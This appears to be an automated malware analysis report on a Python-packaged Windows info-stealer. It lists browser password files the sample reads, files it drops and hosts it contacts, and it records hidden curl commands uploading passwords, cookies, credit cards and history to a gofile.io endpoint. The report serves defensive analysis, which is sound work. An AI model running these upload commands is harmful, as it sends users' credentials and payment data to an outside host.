Technical Information
Malicious functions
Reads files which store third party applications passwords
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %LOCALAPPDATA%\google\chrome\user data\default\web data
- %APPDATA%\opera software\opera stable\login data
Modifies file system
Creates the following files
- %TEMP%\_mei39162\crypto\cipher\_arc4.pyd
- %TEMP%\_mei39162\win32com\shell\shell.pyd
- %TEMP%\_mei39162\win32\win32trace.pyd
- %TEMP%\_mei39162\win32\win32api.pyd
- %TEMP%\_mei39162\win32\_win32sysloader.pyd
- %TEMP%\_mei39162\unicodedata.pyd
- %TEMP%\_mei39162\sqlite3.dll
- %TEMP%\_mei39162\select.pyd
- %TEMP%\_mei39162\pywin32_system32\pywintypes39.dll
- %TEMP%\_mei39162\pywin32_system32\pythoncom39.dll
- %TEMP%\_mei39162\base_library.zip
- %TEMP%\_mei39162\python39.dll
- %TEMP%\_mei39162\libssl-1_1.dll
- %TEMP%\_mei39162\libffi-7.dll
- %TEMP%\_mei39162\libcrypto-1_1.dll
- %TEMP%\_mei39162\_uuid.pyd
- %TEMP%\_mei39162\_ssl.pyd
- %TEMP%\_mei39162\_sqlite3.pyd
- %TEMP%\_mei39162\_socket.pyd
- %TEMP%\_mei39162\_queue.pyd
- %TEMP%\_mei39162\_multiprocessing.pyd
- %TEMP%\_mei39162\pyexpat.pyd
- %TEMP%\_mei39162\pip-20.2.3.dist-info\installer
- %TEMP%\_mei39162\pip-20.2.3.dist-info\license.txt
- %TEMP%\_mei39162\pip-20.2.3.dist-info\metadata
- %LOCALAPPDATA%\tempwpnfwyloen.db
- %LOCALAPPDATA%\tempwpqbxhgwis.db
- %LOCALAPPDATA%\tempwpogcbwngv.db
- %TEMP%\wphistory.txt
- %LOCALAPPDATA%\tempwpjesmmysf.db
- %LOCALAPPDATA%\tempwpbpuleiwe.db
- %LOCALAPPDATA%\tempwpnldwfhuo.db
- %TEMP%\fbfce42j
- %TEMP%\_mei39162\setuptools-49.2.1.dist-info\zip-safe
- %TEMP%\_mei39162\setuptools-49.2.1.dist-info\top_level.txt
- %TEMP%\_mei39162\setuptools-49.2.1.dist-info\entry_points.txt
- %TEMP%\_mei39162\setuptools-49.2.1.dist-info\dependency_links.txt
- %TEMP%\_mei39162\setuptools-49.2.1.dist-info\wheel
- %TEMP%\_mei39162\setuptools-49.2.1.dist-info\record
- %TEMP%\_mei39162\setuptools-49.2.1.dist-info\metadata
- %TEMP%\_mei39162\setuptools-49.2.1.dist-info\license
- %TEMP%\_mei39162\setuptools-49.2.1.dist-info\installer
- %TEMP%\_mei39162\pip-20.2.3.dist-info\top_level.txt
- %TEMP%\_mei39162\pip-20.2.3.dist-info\entry_points.txt
- %TEMP%\_mei39162\pip-20.2.3.dist-info\wheel
- %TEMP%\_mei39162\pip-20.2.3.dist-info\record
- %TEMP%\_mei39162\_lzma.pyd
- %LOCALAPPDATA%\tempwpunomqtzv.db
- %TEMP%\_mei39162\_hashlib.pyd
- %TEMP%\_mei39162\_ctypes.pyd
- %TEMP%\_mei39162\crypto\hash\_md2.pyd
- %TEMP%\_mei39162\crypto\hash\_blake2s.pyd
- %TEMP%\_mei39162\crypto\hash\_blake2b.pyd
- %TEMP%\_mei39162\crypto\cipher\_raw_ofb.pyd
- %TEMP%\_mei39162\crypto\cipher\_raw_ocb.pyd
- %TEMP%\_mei39162\crypto\cipher\_raw_eksblowfish.pyd
- %TEMP%\_mei39162\crypto\cipher\_raw_ecb.pyd
- %TEMP%\_mei39162\crypto\cipher\_raw_des3.pyd
- %TEMP%\_mei39162\crypto\cipher\_raw_des.pyd
- %TEMP%\_mei39162\crypto\hash\_md4.pyd
- %TEMP%\_mei39162\crypto\cipher\_raw_ctr.pyd
- %TEMP%\_mei39162\crypto\cipher\_raw_cbc.pyd
- %TEMP%\_mei39162\crypto\cipher\_raw_cast.pyd
- %TEMP%\_mei39162\crypto\cipher\_raw_blowfish.pyd
- %TEMP%\_mei39162\crypto\cipher\_raw_arc2.pyd
- %TEMP%\_mei39162\crypto\cipher\_raw_aesni.pyd
- %TEMP%\_mei39162\crypto\cipher\_raw_aes.pyd
- %TEMP%\_mei39162\crypto\cipher\_pkcs1_decode.pyd
- %TEMP%\_mei39162\crypto\cipher\_chacha20.pyd
- %TEMP%\_mei39162\crypto\cipher\_salsa20.pyd
- %TEMP%\_mei39162\crypto\cipher\_raw_cfb.pyd
- %TEMP%\_mei39162\crypto\hash\_md5.pyd
- %TEMP%\_mei39162\crypto\hash\_ripemd160.pyd
- %TEMP%\_mei39162\crypto\hash\_sha1.pyd
- %TEMP%\_mei39162\_cffi_backend.cp39-win32.pyd
- %TEMP%\_mei39162\_bz2.pyd
- %TEMP%\_mei39162\vcruntime140.dll
- %TEMP%\_mei39162\pythonwin\win32ui.pyd
- %TEMP%\_mei39162\pythonwin\mfc140u.dll
- %TEMP%\_mei39162\crypto\util\_strxor.pyd
- %TEMP%\_mei39162\crypto\util\_cpuid_c.pyd
- %TEMP%\_mei39162\crypto\publickey\_x25519.pyd
- %TEMP%\_mei39162\crypto\publickey\_ed448.pyd
- %TEMP%\_mei39162\crypto\publickey\_ed25519.pyd
- %TEMP%\_mei39162\crypto\publickey\_ec_ws.pyd
- %TEMP%\_mei39162\crypto\protocol\_scrypt.pyd
- %TEMP%\_mei39162\crypto\math\_modexp.pyd
- %TEMP%\_mei39162\crypto\hash\_poly1305.pyd
- %TEMP%\_mei39162\crypto\hash\_keccak.pyd
- %TEMP%\_mei39162\crypto\hash\_ghash_portable.pyd
- %TEMP%\_mei39162\crypto\hash\_ghash_clmul.pyd
- %TEMP%\_mei39162\crypto\hash\_sha512.pyd
- %TEMP%\_mei39162\crypto\hash\_sha384.pyd
- %TEMP%\_mei39162\crypto\hash\_sha256.pyd
- %TEMP%\_mei39162\crypto\hash\_sha224.pyd
- %TEMP%\_mei39162\_decimal.pyd
- %LOCALAPPDATA%\tempwpexzkccyo.db
Network activity
Connects to
- 'ap#.#pify.org':443
- 'ap#.#ofile.io':443
- 'ge####ation-db.com':443
- 'di##ord.com':443
- 'st####.gofile.io':443
- 'x1.#.lencr.org':80
- 'r3.#.lencr.org':80
TCP
HTTP GET requests
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/CABD2A79A1076A31F21D253635CB039D4329A5E8.crt?ab##############
- http://x1.#.lencr.org/
- http://r3.#.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgR1iwG11QpPusSJpVXKm%2FzAKw%3D%3D
Other
- 'ap#.#pify.org':443
- 'ap#.#ofile.io':443
- 'ge####ation-db.com':443
- 'di##ord.com':443
- 'st####.gofile.io':443
UDP
- DNS ASK ap#.#pify.org
- DNS ASK ap#.#ofile.io
- DNS ASK ge####ation-db.com
- DNS ASK di##ord.com
- DNS ASK st####.gofile.io
- DNS ASK x1.#.lencr.org
- DNS ASK r3.#.lencr.org
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wppasswords.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpcookies.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpcreditcards.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpautofill.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wphistory.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpparsedcookies.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpbookmarks.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
Restarts the analyzed sample
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wppasswords.txt" https://store4.gofile.io/uploadFile"
- '%WINDIR%\syswow64\curl.exe' -F "file=@%TEMP%\wppasswords.txt" https://store4.gofile.io/uploadFile
- '%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpcookies.txt" https://store4.gofile.io/uploadFile"
- '%WINDIR%\syswow64\curl.exe' -F "file=@%TEMP%\wpcookies.txt" https://store4.gofile.io/uploadFile
- '%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpcreditcards.txt" https://store4.gofile.io/uploadFile"
- '%WINDIR%\syswow64\curl.exe' -F "file=@%TEMP%\wpcreditcards.txt" https://store4.gofile.io/uploadFile
- '%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpautofill.txt" https://store4.gofile.io/uploadFile"
- '%WINDIR%\syswow64\curl.exe' -F "file=@%TEMP%\wpautofill.txt" https://store4.gofile.io/uploadFile
- '%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wphistory.txt" https://store4.gofile.io/uploadFile"
- '%WINDIR%\syswow64\curl.exe' -F "file=@%TEMP%\wphistory.txt" https://store4.gofile.io/uploadFile
- '%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpparsedcookies.txt" https://store4.gofile.io/uploadFile"
- '%WINDIR%\syswow64\curl.exe' -F "file=@%TEMP%\wpparsedcookies.txt" https://store4.gofile.io/uploadFile
- '%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpbookmarks.txt" https://store4.gofile.io/uploadFile"
- '%WINDIR%\syswow64\curl.exe' -F "file=@%TEMP%\wpbookmarks.txt" https://store4.gofile.io/uploadFile
